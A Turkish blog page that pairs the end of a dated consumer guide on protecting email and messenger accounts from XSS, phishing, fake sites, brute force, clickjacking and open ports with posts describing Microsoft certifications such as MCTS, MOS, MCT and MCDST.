B2) Verilen linkleri http://linkscanner.explabs.com/linkscanner/ gibi online scanner adreslerinde taratarak sitenin güvenirliğini anlayabilirsiniz.

B3) Özellikle İnternet Explorer dan farklı Tarayıcı kullanmanızı öneririm. Bu demek Mozilla ya da opera kullanın demek değil. Daha alternatif olan Safari,Flock,Songbird gibi herkesin pek rağbet etmediği programları kullanın bunlarada açık olabilir fakat önemli olan Attackerın sizi sık kullanan bir tarayıcı kullandığınızı düşünerek ona göre sistem hazırlamasıdır.Yani Ters köşeye yatırın saldırganı.Ama siz illa ie vs kullanacağım diyorsanız İe8 kullanın,Mozillanın son sürümü mevcut beta sürümü 3.1 Beta 2 onun gibi güncel sürümlerini kullanın.

B4) SM den korunma “A6″ da belirtmiştik güvenmediğiniz kişilerden verilen sitelere girmeyin.Güvensiz olarak belirlenen sitelere hiç girmeyin.Gireceksenizde farklı bir tarayıcıda girin

B5) “A7″ deki Sanal pcde verilen linklere girmeniz en mantıklısıdır.O yüzden Sanal Pc nin önemini anlayınız.

Xss & Xsrf Security :

Xss Size Site üzerinden veya mail,msn gibi konuşma penceresinden yollanıp sizin cookienizi çalmaya yarayan ve bu cookie ile sizin hesaptan giriş yapmaya yarayan bir yöntemdir. Xsrf de bu türe yakındır istem dışı komut yollatmaya çalışır, password değişikliği gibi.Her ne kadar Hotmail Xss de cookie şifrelide gelse bu elbet bir gün çözülecek o yüzden her linke güvenmeyin.

Korunma Yöntemleri ise :

C1) Size verilen linklere tıklamayın kopyalayıp tarayıcıya elinizle yapıştırın.Bu şekilde boş bir cookie çekeceklerdir.
C2) Microsoft Anti Xss, . durumunda haberdar edilip engellenmesi.
C3) Güncel Tarayıcılar kullanmak.Özellikle İE8 de microsoft anti xss scurity programı hazır halde yüklenip tarayıcıya entegre edilmiştir.Bu şekilde korunabilirsiniz.
C4) Firefox kullanıp No script Eklentisini kurup Aktif hale getirmek,işte en önemli xss korunma yöntemlerinden birisidir.Xss yi pasif hale getirir.
C5) Bilinçli olup güncel Haber sitelerinden Xss ve diğer tehditler karşısında bilgiler almak sizi hazır olda bekletir.
C6) SM den korunmak.Tanımadığınız kişilerden link alıp direkt girmeyin.Ayrıca bir linkte hem xss hem Html logger yapıp çifte vuruş yapmak isteyen olabilir o yüzden HTML Logger korunma yönteminide unutmayınız.

Trojan DownLoader Security :

Trojan Downloaderlar bir programa bazı programlar sayesinde eklentiler sayesinde uzaktan ftpsindeki server.exe yi çağırması mantığına dayalıdır.

Bunlardan korunmak içinse :

D1) “A1,A2,A3,A4,A5,A6,A7″ bunlarda dahil her türden tedbirinizi almalısınız.
D2) Ağı izlemek.Programın çalıştırdıktan sonra ağda bir veri aktarımı varsa buna dikkat ederek ne olduğunu anlayabilirsiniz bu tür durumda direkt ağ bağlantısını kesiniz.

Phishing Security :

Phishing genellikle kullanıcıların passlarını almak için kullanılan web Kontrollü fakelerdir.Bir düzenekle siz verileri girince şifreler ftpsinde log.txt ye düşmektedir.

Korunma yöntemlerine geçersek :

E1) “A3″ deki gibi İnternet Security programalrında özellikle Norton ve Kis de AntiPhishing özelliği vardır buda Sahteciliği önler.Size uyarı olarak bu site sahtekardır mesajı verir.
E2) Site Adresinin Doğruluğunu kontrol ediniz. Mesela hotmail.com.tr.gg gibi bir adresten geliyorsa dikkate almayınız. Ayrıca bazı link gizleme yanıltmaları ile linki gizlerler içeriğe bakıp yada tarayıcıdaki adrese bakıp güvenirliğini anlayabilirsiniz.
E3) SM den korunmak Güvenmediğiniz sitelere girmeyin,Linke tıklamayın,Her yerde her sitede aynı şifreyi kullanmayın.

Fake Security :

Fake Türkiyede okadar meşhur olduki çoluk çocuk herkes bir sitenin fakesini yapıp şifre almaya bakıyor.Fakede amaç sahte bir site görünümü izlenimi verip şifreleri mail aracılığı ile Attackera göndermeye amaçlar.

Fakeden korunmak için :

F1) Phishingle aynı mantık olacağından oradaki “E1,E2,E3″ e dikkat edin.
Basittir ama bir anlık dalgınlık sizi yanıltabilir.
F2) Sitenin kaynak kodunu görünteleyip kodları inceleyin gerekirse “@” i arayıp kayıtlı bir mail adresi varmı bakınız.

Msn Cracker – Brute Force Security :

Brute Force yöntemi Şifrenizi deneme yanılma ile tahmin edecek bir programın çalıştırılmasıdır.Bunda amaç tek tek şifreleri dener olumluysa şifreyi gösterir.
Korunmak için :

G1) Şifreleriniz oldukça güçlü olmalıdır.2. ve 3. karakterler mutlaka şifrenizde olmalıdır(Örneğin : #!?\\\\\\\\-_).
G2) Belirli Aralıklarla şifrenizi değiştirin.Bu şekilde program sonuca yaklaşsada pek netici alamaz.

CLickJacking Security :

Clickjacking bir nevi başka bir içeriğin bulunması ama size makyajla başka birşey göstermesi o alana şifrenizi yazarsanız Attackera verilerimiz gidecektir. Bir nevi site üzerine resim yerleştirme gibi birşey diyebiliriz basit anlamda.

Korunmak için :

H1) Korunmanın en önemli yöntemi yolu Mozilla kullanıp.No Script kurup “Plugins|Forbid <IFRAME>” özelliğini aktif etmelisiniz.

H2) Kaynak kodlarına bakıp ne olduğunu anlayabilirsiniz.

Networking – Port Security :

Bilgisayarınızda Bazı portlar olsun bazı programların açtığı portlar ve güvenlik açıkları Attackerların pcnize oradanda mail şifrelerinize sızmak için olanak sağlamaktadır.

Korunma Yöntemleri :

I1) Bilgisayarınızı Port Scanner programları ile tarayıp açık portlar varsa kapatınız.Diğer maddelerde belirttiğim gibi Güvenlik Duvarı ve İnternet security programları kullanın.Girişleri engeller.
I2) Özellikle Netbios Açığını kapatmak (138,138,139) gibi portları kapatmak pcnize sızmanızı engeller.Limewire gibi programalrı kullanırkende ayarları dikkatli yapmanız lazım.

Kişisel Güvenlik :

Buraya kadar olan her maddeyi öğrenip uyguladıktan sonrada gerisi bizim zekamıza kalacak birşey.Bilgisayarınızda msn şifresini hatırla demeniz Stealer gibi programların coşmasına sebep olacak yani şifrenizi alacaklardır.Ya da pcnize başka birisinin oturmasına imkan vermeniz sizin açınızdan pek yararlı olmayacaktır.Güvenlik sorularınız bilinecek türden ve basit olmamalıdır.Şifrelerinizde aynı şekilde zorlaştırılmış olmalı.Kişisel bilgilerinizi kimseye vermemelisiniz.Arada sırada Hijackthis uygulamalısınız gözünüze çarpan program vs varmı.Anti Spy programalrı ile belli aralıklarlada sistemi taratmalısınız.

Sonuç :

Sayın okurlarım bir çok önemli yöntemleri ve korunma yolları hakkında sizleri bilinçlendirmek istedim. Bugun bu yöntemler var fakat ileriki dönemlerde farklı yöntemler çıkacaktır. Size düşen görevler  bilinçli,sezici, kuşkucu olmaktır. Güvenlik meselesi çok geniş ve derin bir konudur. Kurumsal firmalar sadece güvenlik için profesyonel destek almaları gerekmektedir.

Incoming search terms:

keylogger trojan oluşturma
29Mar/110

Microsoft egitimleri ile hangi sertifikaları alabilirim?

Microsoft eğitimleri ile hangi sertifikaları alabilirim?
Öğrencilerimizden gelen sorular sonrasında sertifikasyon hakkında bir bölüm oluşturmaya karar verdim. En kısa sürede sertifikasyonları daha detaylı bir şekilde anlatmaya başlayacağım.

İlk Sorumuz:Microsoft eğitimleri ile hangi sertifikaları alabilirim?

Microsoft Sertifikasyonları

MCTS  Microsoft Certified Technology Specialist (MCTS)
MCITP  Microsoft Certified IT Professional (MCITP)
MCPD  Microsoft Certified Professional Developer (MCPD)
Microsoft Certified Architect Program  Microsoft Certified Architect Program.
MCDST  Microsoft Certified Desktop Support Technicians (MCDSTs
MCLC  The Microsoft Certified Learning Consultant (MCLC)
MCSA  Microsoft Certified Systems Administrators (MCSA.
MCSE  Microsoft Certified Systems Engineers (MCSE)
MCDBA  Microsoft Certified Database Administrators (MCDBA)
MCT  Microsoft Certified Trainers (MCT)
MCAD  Microsoft Certified Application Developers (MCAD)
MCSD  Microsoft Certified Solution Developers (MCSD)
Microsoft Certified Business Management Solutions Specialist  Microsoft Certified Business Management Solutions Specialists
Microsoft Certified Business Management Solutions Professional Microsoft Certified Business Management Solutions Professional
Microsoft Office Specialist Microsoft Office Specialists (Office Specialists)
MCAS Microsoft Certified Application Specialists (MCAS)

29Mar/110

MCTS Sertifikasyonu

MCTS Sertifikasyonu
MCTS Nedir?
Son 10–15 yılda hızla gelişen bilişim sektöründe büyük bir istihdam açığa çıktı. Bu istihdamı karşılamak amacı ile Microsoft gibi sektöre yön veren firmalar ise sertifikasyon yapıları oluşturarak kalifiye elemanlar yetiştirmeye başladı. Yakın zamana kadar, genel sertifikasyon sistemleri geniş kapsamlı uzmanlıkları içeriyordu. Örneğin MCSD (Microsoft Certified Solution Developer) sertifikasyonu yazılım uzmanlığını gösterirken; web uygulamalarını ve SQL (Veritabanı) konularına olan hâkimiyeti de karşılıyordu. Fakat gelişen sektörde artan rekabet gücüne karşı direnç gösterebilmek için daha profesyonel işler ortaya çıkarmak gerekti. Birçok konuda bilgi ve sertifikasyon sahibi çalışanlar daha derin ve özel uzmanlık gerektiren

konularda sıkıntı çekmeye başladılar. Piyasada artık bir konuda uzmanlaşmış, konusuna hâkim ve en ince ayrıntıları bilebilecek personellere ihtiyaç duyulmaya başlandı. Bu noktada Microsoft MCTS sertifikasyonları ile kişilerin daha dar konularda da olsa, konularında uzmanlıklarını göstermek amacıyla yapılandırılmıştır. Özel uzmanlık sertifikası olan MCTS şimdiye kadar 20 başlıkta ki uzmanlığı sertifikalamaktadır. Ak-Ser Bilgisayar’da uzmanlığı verilen başlıca konular aşağıdaki gibidir. Bu konular;

MCTS UZMANLIĞI SINAV KODU
MCTS: Windows Server 2008 Active Directory Configuration 70-640
MCTS: Windows Server 2008 Network Infrastructure Configuration 70-642
MCTS: Windows Server 2008 Applications Infrastructure Configuration 70-643
MCTS: .NET Framework 2.0 Web Applications 70-536, 70-528
MCTS: .NET Framework 2.0 Windows Applications 70-536, 70-526
MCTS: .NET Framework 2.0 Distributed Applications 70-536, 70-529
MCTS: SQL Server 2005 70-431
MCTS: SQL Server 2005 Business Intelligence 70-445
MCTS: Business Desktop Deployment 70-624
MCTS: Windows Vista – Configuration 70-620

Incoming search terms:

mcts nedirmctsmcts sertifikası nedir
29Mar/110

MOS – Microsoft Office Specialist

MOS – Microsoft Office Specialist

Office sertifikasyonu: MOS
Teknik sertifikasyonu: MCP ve diğer teknik sertifikalar.
Microsoft Office Specialist Certification
Microsoft Office Specialist (Office Specialist) programı özellikle Microsoft Office üzerine uzmanlığı belgeler.

MOS alanları:
Microsoft Word

Microsoft Excel

Microsoft Outlook

Microsoft PowerPoint

Microsoft Access

Microsoft Project

Office Specialist programı iki düzey sağlar:
Core (temel)

Expert (uzman)

Bunun dışında MOS sertifikaları yüzden fazla ülkede ve farklı dillerde sunulmaktadır.

Microsoft sertifikasyonu hakkında geniş ve güncel bilgi: http://www.microsoft.com/traincert/

29Mar/110

MCT

MCT (Microsoft Certified Trainer) Microsoft Yetkili Teknik Eğitmenlik Sertifikası belli bir sınav sonucunda kazanılan bir unvan değildir. Resmi Microsoft Eğitim Programına uygun kurs verebilme düzeyini simgeleyen bu sertifikasyon, öğrenen konumundan, öğreten konumuna geçmek anlamına gelmektedir. MCSE, MCDBA, MCSD gibi çeçitli sertifikaları hak etmiş uzmanlar teknoloji eğitmeni olmak istediklerinde MCT programına dahil olabilirler.

 

MCT Olmak İçin Gerekenler

1. Öncelikle MCP programında yer alan ya da Microsoft Business Solutions Sertifikalarından Birine Sahip Olmak

MCSE, MCSA, MCDST, MCSD, MCAD, MCDBA, MCPD, MCITP, 70-301: MSF Sertifikaları ya da Microsoft Dynamics yeterliliği aranmaktadır. * Business Skills Series için 1 Ekim 2006’dan başlayarak konuyla ilgili IW (Information Worker) yeterliliği ile MCT’ler kurs verebileceklerdir.

2. Eğitimen Sunum Tekniklerinde Yeterlilik

Microsoft’un onayladığı kurumlar tarafından verilen Sunum Teknikleri kursunu başarıyla tamamlamış olmak gerekir.

CompTIA tarafından verilen Certified Technical Trainer (CTT+) sertifikasına sahip olmak da kabul edilmektedir.

Microsoft Former MCT, Cisco, Citrix, Novell, Oracle tarafından belgelenen sertifikalı eğitmenler de onaylanmaktadır.

Akademik Eğitmenlik de bu kategoride kabul görmektedir.

3. MCT Application

Microsoft web sitesinden MCT Application tamamlanmalıdır. Çeşitli ülkelerdeki uygulama farklılıklarına göre CPLS “Microsoft Certified Partner for Learning Solutions” çalışanı olmak bazen zorunlu tutulmakta bazen de avantaj olarak değerlendirilmektedir.

4. MCT Program Onayı

Bütün işlemler tamamlandıktan sonra Microsoft tarafından onay verildiğinde MCT programına katılım sağlanmış olur ve 6-8 hafta içinde MCT Kabul Kiti gönderilir.

Diğer sertifikasyonlardan farklı olarak MCT programına dahil olanlar her yıl unvanlarını yenilemek zorundadırlar. Yenileme için yıllık faliyet puanları değerlendirilmektedir. Belli sayıda kişiye eğitim verme, yeni sınavlar geçme gibi etkenlikler sürekli olarak izlenmekte ve puanlanmaktadır. Bu nedenle MCT Sertifikasyonu aktif bir süreçtir.

MCT Olmanın Sağladığı Avantajlar

MCP programının avantajlarına ek olarak MCT olmanın önemli avantajları vardır.

MCT Kabul Kiti

MCT olduktan sonra 6-8 hafta içinde adresinize yurt dışından postalanan gönderide MCT sertifikası, rozet, kimlik kartı, Microsoft Learning Base Virtual Hard Disk DVD’leri, Metrics That Matter (MTM) kılavuzu ve diğer haklardan yararlanmanız için gerekli açıklayıcı bilgi yer alır. Bir firma gibi Microsoft’un lisanslarını ve kaynaklarını kullanarak eğitim verme hakkınız vardır.

MCT Community Center

Diğer MCT programı üyeleriyle birlikte ortaklaşa kullandığınız iletişim kanalıdır.

MCT Memeber Site Üyeliği

Yeni gelişmeler, kaynaklar ve eğitmen gereksinimlerine hizmet eden hazırlık kaynakları, eğitim ürünleri, yeni test duyuruları ve diğer bilgilere erişim sağlar.

MCT News Grupları

Özel destek ve iletişim sağlar.

MCT Download Center

Microsoft Learning ve Microsoft Dynamics ürün kitaplığına ücretsiz erişim sağlar; tüm ürünleri indirme ve onlardan yararlanma olanağı sağlar.

Metrics That Matter

Eğitmenlik faliyetleri ve katılımcı memnuniyetini izlemek için kullanılır.

Sınav İndirimleri

%45-%20 düzeyinde MCP sınavlarında indirim hakkı vardır.

Serbest E-Learning Erişimi

Özelleştirilmiş eğitimler ve karma eğitimlerde yararlanmak üzere Microsoft’un hazır e-learning ürünlerine erişim hakkı sağlar.

TechNet Plus İndirimi

Ürün desteği, sorun çözme ve planlamada çok önemli kaynak olan TechNet Plus ürünlerinden %20 indirimli yararlanma hakkı vardır.

Microsoft Partner Özel Avantajları

Microsoft İş Ortaklarının sağladığı yazılım, haber ve bilgi erişimi, üyelikler gibi hizmetlerde indirimler ve daha fazla olanaklar.

Microsoft Etkinliklerinde Özel Davet ve İndirim

Tech Ed ve diğer büyük Microsoft organizasyonlarına öncelikli davet ve indirimlerden yararlanma hakkı sağlanır.

MCP Beta Sınavları

Yeni ürünlerin satışa çıkmadan önce sınavlarına erken davet olanağı. Bu sayede her zaman diğer uzmanlardan öncelikli olma ayrıcalığı.

Microsoft Yazılımlarında Öncelik

Beta ürünlerle ilgili etkinliklere davet edilerek ürün sunulmadan önce eğitimini vermeye hazır hale gelme ayrıcalığı.

29Mar/110

MCDST

Bilgi teknolojilerinin hızla gelişmesi ve yaygınlaşması ile birlikte günümüzde pek çok küçük ve orta ölçekli firma (KOBİ) işlerini bilg isayar ortamında yürütmektedir. Satış, muhasebe ve stok gibi süreçler, e-posta ve Internet bağlantısı gibi aktiviteler network sistemleri ve masaüstü PC sistemleri üzerinde çalışmaktadır. MCDST sertifikasyon programı işte bu ve benzeri süreçleri yönetmek üzerine hazırlanmış bir eğitim programıdır. Sektörde ciddi anlamda bulunan Sistem Destek Teknisyeni ihtiyacına yönelik bu program, katılımcılara Microsoft Windows XP Professional istemci sisteminin tüm ayrıntılarını, sistem içinde uyumlu çalışmasını ve olası tüm problemlerinin sağlıklı bir şekilde giderilmesi konusunda ileri düzey bilgi vermesi amacı ile Microsoft tarafından hazırlanmıştır.

MCDST Neler Yapar ve Uzmanlık Alanları Nelerdir?
Bilgi İşlem departmanlarında sistem destek grubunda görev alır.
Küçük veya orta ölçekli sistemlerdeki problemlerin giderilmesini sağlarlar.
Firmalarda bilgisayar, donanım ve program satın almasını yapar.
Kullanıcıların teknik problemlerine çözüm getirir.
Teknolojiyi çok yakından takip ederek yeni gelişmeleri firmasına uygular
MCDST Hangi Ünvanları Alabilir?
Sistem Destek Teknisyeni
Sistem Destek Uzmanı
Bilgi İşlem Görevlisi
Bilgi İşlem Uzmanı
Teknik Destek Elemanı
Teknik Destek Sorumlusu
Tecrübe ve alt yapıya bağlı olarak farklı bir birime terfi edilebilir ya da aynı birim içerisinde seviyesi

Etiketler: Yorum yok
Copy Protected by Chetan's WP-Copyprotect.